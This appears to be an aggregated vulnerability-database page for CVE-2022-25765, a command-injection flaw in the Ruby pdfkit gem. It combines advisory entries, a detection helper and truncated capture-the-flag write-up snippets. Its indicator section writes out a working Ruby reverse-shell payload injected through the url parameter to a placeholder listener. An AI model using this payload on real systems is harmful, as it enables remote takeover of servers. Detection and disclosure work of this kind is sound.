CVE-2022-25765
Published 2022-09-09
CVE-2022-25765: Versions of the package pdfkit from 0.0.0 are vulnerable to Command Injection where the URL is not properly sanitized.
Priority: P2 · 75 · critical · 9.8 (CVSS 3.1)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 38.92% (98.4th percentile)
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fedoraproject | fedora | — | — |
| fedoraproject | fedora | — | — |
| fedoraproject | fedora | — | — |
| pdfkit_project | pdfkit | >= 0 < 0.8.7.2 | 0.8.7.2 |
| pdfkit_project | pdfkit | >= 0.0.0 < unspecified | unspecified |
| pdfkit_project | pdfkit | >= 0.0.0 | — |
Detection & IOCs
command: http://%20`ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("{listenIP}","{listenPort}"))'`
- The vulnerability affects all pdfkit versions from 0.0.0 through 0.8.7.2; the exploit was specifically tested on pdfkit 0.8.6, so detection rules should cover the full version range.
- The default POST parameter targeted by the exploit is `url`; applications may use different parameter names, requiring tunable detection rules.
- The injection requires the URL to contain a space encoded as `%20` immediately before the backtick-wrapped command; URL-decoding must be applied before pattern matching in WAF/IDS rules.
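The two rule requirements above (tunable parameter name, decode before matching) as an added Ruby example; it is not code from this page or from the pdfkit project. The names `fully_decode` and `suspicious_params` are hypothetical, and the request bodies are constructed samples with `CMD` as a placeholder.

```ruby
require "uri"

# Shape listed on this page after decoding: whitespace, then backtick-wrapped text.
PAGE_SHAPE = /\s`[^`]+`/

# Decode percent-encoding repeatedly (bounded). A form-encoded body carries the
# literal "%20" of the URL as "%2520", so a single pass is not enough.
def fully_decode(value, max_rounds = 3)
  max_rounds.times do
    decoded = URI.decode_www_form_component(value)
    return decoded if decoded == value
    value = decoded
  end
  value
rescue ArgumentError
  value # malformed percent-encoding: fall back to the last text that decoded
end

# Returns the watched parameter names whose decoded value matches PAGE_SHAPE.
# `params` is tunable because applications may not use the default name `url`.
def suspicious_params(body, params: ["url"])
  body.split("&").filter_map do |pair|
    name, raw = pair.split("=", 2)
    next unless name && params.include?(fully_decode(name))
    decoded = fully_decode(raw.to_s).scrub
    name if decoded.match?(PAGE_SHAPE)
  end
end

# Constructed sample request bodies (not captured traffic).
CLEAN   = "url=http%3A%2F%2Fexample.test%2Freport"
ENCODED = "url=http%3A%2F%2F%2520%60CMD%60"
RENAMED = "target=http%3A%2F%2F%2520%60CMD%60"

if __FILE__ == $PROGRAM_NAME
  puts "raw match on encoded body: #{ENCODED.match?(PAGE_SHAPE)}"
  puts "decoded match: #{suspicious_params(ENCODED).inspect}"
  puts "renamed param: #{suspicious_params(RENAMED, params: %w[url target]).inspect}"
end
```

Matching the raw body finds nothing because both the space and the backticks are still percent-encoded; the rule only fires once the value has been decoded.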
GHSA
PDFKit vulnerable to Command Injection
ghsa·2022-09-10
CVE-2022-25765 [CRITICAL] CWE-77 PDFKit vulnerable to Command Injection
The package pdfkit is vulnerable to Command Injection where the URL is not properly sanitized.
Note: This issue was patched in 0.8.7.2, but the patch was discovered to be ineffective. The updated patch version is 0.8.7.2.
OSV
PDFKit vulnerable to Command Injection
osv·2022-09-10
CVE-2022-25765 [CRITICAL] PDFKit vulnerable to Command Injection
The package pdfkit is vulnerable to Command Injection where the URL is not properly sanitized.
Note: This issue was patched in 0.8.7.2, but the patch was discovered to be ineffective. The updated patch version is 0.8.7.2.
No detection rules found.
CTF
medium / README
ctf_writeups·CVSS 9.1
[CRITICAL] medium / README
---
layout: default
title: Medium Machines
parent: Machines
nav_order: 2
description: "112+ Medium HTB machine writeups with walkthroughs"
permalink: /machines/medium/
---
# HackTheBox - Medium Machines
> Comprehensive index of retired HTB Medium-difficulty machines with key techniques and attack path summaries.
**Total: 100+ machines** | Sorted roughly by retirement date (newest first)
---
## Machine Index
| # | Machine | OS | Key Techniques | Attack Path Summary | Writeup |
|---|---------|-----|----------------|---------------------|---------|
| 1 | Signed | Linux | Code Signing Bypass, Certificate Abuse | Forge code signature to deploy malicious update, escalate via trusted binary execution | [0xdf](https://0xdf.gitlab.io/2026/02/07/htb-signed.html) |
| 2 | Voleur | Linux | Data E
CTF
Precious / README
ctf_writeups·CVSS 7.3
[HIGH] Precious / README
# Precious
> Write-up author: jon-brandy
## DESCRIPTION:
- NONE
## HINT:
- NONE
## STEPS:
1. First, let's run nmap to check if there are any ports open.
> RESULT
2. Notice the machine seems to be running a web application, let's open the host in the web browser.
> RESULT
3. Let's enter `http://google.com`.
> RESULT
4. Already tried to enter my own ip but didn't get any pdf.
5. Let's serve http on port 8000 first.
> RESULT
6. Great! We got it.
7. Check the metadata, to see if we can grab any clue.
> RESULT
8. Notice the version of pdfkit is outdated and it's vulnerable.
> WRITTEN IN CVE MITRE
```
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25765
```
9. Hence I did a small outsource about the approach they used for this vuln, found this link.
```
https://security.s
CTF
easy / README
ctf_writeups·CVSS 6.0
[MEDIUM] easy / README
---
layout: default
title: Easy Machines
parent: Machines
nav_order: 1
description: "120+ Easy HTB machine writeups with walkthroughs"
permalink: /machines/easy/
---
# HackTheBox Easy Machines - Comprehensive Reference
> Complete catalog of retired HTB Easy machines with OS, key vulnerability, attack path summary, and quality writeup links.
**Total: 100+ Easy Machines** | Updated: April 2026
---
## Quick Navigation
- [Classic / Legacy Machines (2017-2019)](#classic--legacy-machines-2017-2019)
- [2019-2020 Machines](#2019-2020-machines)
- [2021 Machines](#2021-machines)
- [2022 Machines](#2022-machines)
- [2023 Machines](#2023-machines)
- [2024 Machines (Season 4 & 5)](#2024-machines-season-4--5)
- [2025-2026 Machines (Season 6+)](#2025-2026-machines-season-6)
---
## Classic / Legac
http://packetstormsecurity.com/files/171746/pdfkit-0.8.7.2-Command-Injection.html
https://github.com/pdfkit/pdfkit/blob/46cdf53ec540da1a1a2e4da979e3e5fe2f92a257/lib/pdfkit/pdfkit.rb%23L55-L58
https://github.com/pdfkit/pdfkit/blob/master/lib/pdfkit/source.rb%23L44-L50
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/C36GAV3TKM3JXV6UVMLMTTDRCPKSNETQ/
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ESWB6SX7HYWQ54UGBGQOZ7G24O6RAOKD/
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JFB2BFKH5SUGRKXMY6PWRQNGKZML7GDT/
https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
2022-09-09
Published